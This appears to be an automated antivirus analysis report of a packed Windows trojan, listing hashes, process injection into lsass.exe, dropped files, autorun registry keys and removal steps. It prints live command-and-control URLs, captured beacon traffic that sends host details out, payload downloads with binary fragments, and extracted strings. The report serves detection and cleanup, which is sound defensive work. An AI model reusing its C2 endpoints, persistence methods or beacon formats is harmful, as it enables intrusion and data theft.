MD5: d358217856c7b4c3af399b483494d9c0
SHA1: f8eeaf79d8880959c76119aec557f1b4d13bf089
SHA256: 2d0448105fe3301d5a33052eab3947ca95ee4a5d7b70a879329cad9294180c31
SSDeep: 384:x734EKHg9Uu031KnthHhp3LSmqREBU6Q2BpjhZEdBEd7D:x78gV03ehBp7qLj2rjpd7
Size: 23552 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2014-12-07 21:53:23
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:468
lsass.exe:1232

Mutexes

The following mutexes were created/opened:

ShimCacheMutex
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
krikoc

File activity

The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bitck1\Text.txt (34 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\lsass.exe (1643 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\smss.exe (2559 bytes)
%Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe (23 bytes)

Registry activity

The process %original file name%.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 A4 98 A8 3C 14 FF 2B 02 C7 31 24 6B AA B8 FB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx]
"smss.exe" = "smss"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx]
"lsass.exe" = "lsass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows" = "%Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows" = "%WinDir%\explorer\smss.exe"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://87.121.52.65/panel/includes/verif.php
hxxp://87.121.52.65/panel/includes/persis.php
hxxp://87.121.52.65/panel/includes/kit47896.exe
hxxp://87.121.52.65/panel/includes/btcplugin.php
hxxp://87.121.52.65/panel/includes/btcplugin.exe
hxxp://87.121.52.65/panel/includes/d_elay.php
hxxp://87.121.52.65/panel/includes/day.php
hxxp://87.121.52.65/panel/includes/ip.php
hxxp://87.121.52.65/panel/includes/country.php?IP=37.57.16.189
hxxp://87.121.52.65/panel/includes/idcontact.php?COMPUTER=XP8&steam=0&origin=0&webnavig=0&java=1&memoireRAMbytes=536330240&diskhard=8578932736&avname=0&parefire=0&install=20150109&gpu=0&cpu=Intel(R)Core(TM)[email protected]
hxxp://87.121.52.65/panel/includes/bkill.php

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET hXXp://87.121.52.65/panel/includes/btcplugin.php HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:31 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Set-Cookie: PHPSESSID=lqi4e95lrqstopcclai470ofu0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 34

Connection: close

Content-Type: text/html
1A1NepMBi53mVcwxAZrRe27o74TG1NyVzH..

GET /panel/includes/idcontact.php?COMPUTER=XP8&steam=0&origin=0&webnavig=0&java=1&memoireRAMbytes=536330240&diskhard=8578932736&avname=0&parefire=0&install=20150109&gpu=0&cpu=Intel(R)Core(TM)[email protected] HTTP/1.0

Host: 87.121.52.65

User-Agent: crackim

Connection: Close

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:33 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Set-Cookie: PHPSESSID=geop1e975ufokv1uu1ljfnue52; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 14

Connection: close

Content-Type: text/html
Statistics Ok!..

GET hXXp://87.121.52.65/panel/includes/d_elay.php HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:32 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Set-Cookie: PHPSESSID=81hog5asr691h2fa36861u0mu4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 5

Connection: close

Content-Type: text/html
60000..

GET /panel/includes/kit47896.exe HTTP/1.0

Host: 87.121.52.65

User-Agent: crackim

Connection: Close

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:30 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sat, 27 Dec 2014 18:26:55 GMT

ETag: "2600ddc-2200-50b36c9369c2c"

Accept-Ranges: bytes

Content-Length: 8704

Connection: close

Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...y..T
...............2. .......`.......p........@...........................
......................................................................
......................................................................
..........................UPX0.....`..............................UPX1
..... [email protected].............................
[email protected]!.....8.W.....d.......6..&.......h..h...W@............._
..... .*;v...../.#.....?l.....".n..$X.5...!..$-,.S1.P......T$......h.6
.(.P...?.D$..|........X..n.FRR.t$k.'.....SR,..:.m*.4.....|P{.v.' .'<
;5..6`..$.....Z..-..-..Q..$......./...!.t......h.....`sV'..........n..
4.......y.W[..S.......$*JI...u..9,.[.(..~..\{.,.C.\.)...].g...P-.L$...
.e......@....@6.< ........R.t..s.v......Wp...;...4l.........!..6...
::$.. |.1wi ]".q.7...7{lz............X..t....#....f.^O."..{...." J.D$O
rH ..P@3X....=..mp....:.!..^!...s....l.....:..._6.v..h O...\.%.V0t2. .
.8..KSn..k...0.J!..'n..F||)2...KA......tV\!c...Y...u8.#<.....$..G..
B.8.Iu..6l..qJR .;a 9...1..9s.T.(...).lIn.>...X....@ .^....Pr......
 ..... V}.lt .w....h..P.U'y..;.$u..F...:.....'y..".(..2...y..<...\.
.{W..2|...(4..!.<x.....w...........`Y..h...t .e..u.h.P.....Y`......
..]k#.Mu...<G..8...*8*..X.."...Ub.vO..#h.l..vy.@.<.l|{.......{h.
.........`...6@t.'.~.%....f}..$.-.....y`.....O...FA.[....<=......o.
...{X..._........h.S..PQ...82..".... .....B2......F.!. c.z. <..
<<< skipped >>>

GET hXXp://87.121.52.65/panel/includes/day.php HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:33 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Vary: Accept-Encoding

Content-Length: 8

Connection: close

Content-Type: text/html
20150109..

GET hXXp://87.121.52.65/panel/includes/verif.php HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:30 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Vary: Accept-Encoding

Content-Length: 1

Connection: close

Content-Type: text/html
1..

GET /panel/includes/btcplugin.exe HTTP/1.0

Host: 87.121.52.65

User-Agent: crackim

Connection: Close

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:32 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Sat, 27 Dec 2014 18:26:19 GMT

ETag: "2600dac-1a00-50b36c718fab6"

Accept-Ranges: bytes

Content-Length: 6656

Connection: close

Content-Type: application/x-msdos-program
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......T
...............2. .......`.. ....p........@...........................
..................................................@...................
......................................................................
..........................UPX0.....`..............................UPX1
..... [email protected].............................
[email protected]!......V'j....c.......,..&.......h .h...T@..............
.... .....*.../L!......w..[.5.-hP@#..h.............".....F*......_....
&...T$.E.L..!.t....0}....!.u.(.RR.......h.q6......G.g.o.....h.'..9{...
........ d...,..........:...|2..:.. h2^2..............h>..J...6&..d
(*B".J.:.,..m....u....<.!....d.l.....|.$G..S1.P..D$ ...o.4.......h"
qt...1..l."...$O....uR...P.7..\...l....s......:......_...O.....T..t2 .
. ..KS}...an.k...1H.F.r.,..)2/M...l....h..t..c.V\.Y._.u8M....B...$....
>....!..0......&.T7".qJ..2`R 9\.=K."..T.y.I/I..o....<..l....u...
u...^.....J.^F.-..(X..2.....na.f...4.. ;......l.y..[....._.QRQ.Y...l..
4..%.Q...............V]..Y..P....I.nS.......f..u. ....3........Q.|..V.
.u...o..^Y.?.SU.-.RM .W.......VN...<0..P......k.W..... .u.\...V...L
$.u._][C..n......N^3(<.o[s;Q.,1....8m...gGPM....F..........\^..|...
.I......HtR;f;.....u.%...tN....<?.../.. .u. .....t.....,.g._....^].
[[email protected]>t@.:t;.98u. ........}.
...;.~.H..DN...f.....S...(_@^[.{...j.Ok....BpB:V&.y50.err%.7...0&l
<<< skipped >>>

GET hXXp://87.121.52.65/panel/includes/persis.php HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:30 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Set-Cookie: PHPSESSID=e7ddgh5moigcspfvn87ceotcb2; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1

Connection: close

Content-Type: text/html
1..

GET hXXp://87.121.52.65/panel/includes/ip.php HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:33 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Vary: Accept-Encoding

Content-Length: 12

Connection: close

Content-Type: text/html
37.57.16.189..

GET hXXp://87.121.52.65/panel/includes/bkill.php HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:34 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Set-Cookie: PHPSESSID=pondu5mvbqjvf3ioha070j87b4; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1

Connection: close

Content-Type: text/html
1..

GET hXXp://87.121.52.65/panel/includes/country.php?IP=37.57.16.189 HTTP/1.

HTTP/1.1 200 OK

Date: Fri, 09 Jan 2015 11:31:33 GMT

Server: Apache/2.2.22 (Debian)

X-Powered-By: PHP/5.4.35-0 deb7u2

Vary: Accept-Encoding

Content-Length: 7

Connection: close

Content-Type: text/html
Ukraine..

The Trojan connects to the servers at the folowing location(s):

ws2_32.dll

?456789:;<=

!"#$%&'()* ,-./0123

CreatePipe

RegCreateKeyW

RegOpenKeyW

RegCloseKey

RegOpenKeyExW

RegDeleteKeyW

ShellExecuteW

ShellExecuteExW

EnumWindows

.code

`.text

`.rdata

@.data

4%_i%c

.tl3fl

KERNEL32.DLL

ADVAPI32.DLL

COMCTL32.DLL

MSVCRT.dll

OLE32.DLL

SHELL32.DLL

USER32.DLL

WINMM.DLL

WSOCK32.DLL

2147483648

%%.ß

post.php

persis.php

btcplugin.php

ip.php

ntdll.dll

D:\NVIDIA\

kit47896.exe

\Opera\

(x86)\Opera\

country.php?IP=

verif.php

D:\AMD\

install_info.php

Kernel32.dll

kernel32.dll

Windows

\Chrome\

smss.exe

HTTP/1.0

gettask.php?RUN=

\bitck1\Text.txt

Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

rpcss.exe

DlExe

\System\Oracle\smss.exe

psapi.dll

d_elay.php

\explorer\smss.exe

pinginfo.php

%Program Files%\McAfee\

(x86)\Firefox\

\System\Oracle\azioklmpx\lsass.exe

\System\Oracle\azioklmpx\smss.exe

btcplugin.exe

explorer.exe

day.php

&webnavig=

idcontact.php?COMPUTER=

get.php?IP=

\Firefox\

(x86)\Chrome\

C:\AMD\

C:\NVIDIA\

bkill.php

Software\Microsoft\Windows\CurrentVersion\Run

hXXp://

{118c04c0-7454-11e2-81a8-806d6172696f}

%original file name%.exe_468_rwx_00401000_00012000:

ws2_32.dll

?456789:;<=

!"#$%&'()* ,-./0123

CreatePipe

RegCreateKeyW

RegOpenKeyW

RegCloseKey

RegOpenKeyExW

RegDeleteKeyW

ShellExecuteW

ShellExecuteExW

EnumWindows

.code

`.text

`.rdata

@.data

4%_i%c

2147483648

%%.ß

post.php

persis.php

btcplugin.php

ip.php

ntdll.dll

D:\NVIDIA\

kit47896.exe

\Opera\

(x86)\Opera\

country.php?IP=

verif.php

D:\AMD\

install_info.php

Kernel32.dll

kernel32.dll

Windows

\Chrome\

smss.exe

HTTP/1.0

gettask.php?RUN=

\bitck1\Text.txt

Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

rpcss.exe

DlExe

\System\Oracle\smss.exe

psapi.dll

d_elay.php

\explorer\smss.exe

pinginfo.php

%Program Files%\McAfee\

(x86)\Firefox\

\System\Oracle\azioklmpx\lsass.exe

\System\Oracle\azioklmpx\smss.exe

btcplugin.exe

explorer.exe

day.php

&webnavig=

idcontact.php?COMPUTER=

get.php?IP=

\Firefox\

(x86)\Chrome\

C:\AMD\

C:\NVIDIA\

bkill.php

Software\Microsoft\Windows\CurrentVersion\Run

hXXp://

{118c04c0-7454-11e2-81a8-806d6172696f}

lsass.exe_1232:

`.rsrc

.code

`.text

`.rdata

@.data

.rsrc

version="1.0.0.0"

name="CompanyName.ProductName.YourApp"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

KERNEL32.DLL

MSVCRT.dll

USER32.DLL

WINMM.DLL

\bitck1\Text.txt

lsass.exe_1232_rwx_00401000_00007000:

.code

`.text

`.rdata

@.data

.rsrc

\bitck1\Text.txt

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\bitck1\Text.txt (34 bytes)
   %Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\lsass.exe (1643 bytes)
   %Documents and Settings%\%current user%\Application Data\System\Oracle\azioklmpx\smss.exe (2559 bytes)
   %Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe (23 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Windows" = "%Documents and Settings%\%current user%\Application Data\System\Oracle\smss.exe"
   
   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Windows" = "%WinDir%\explorer\smss.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.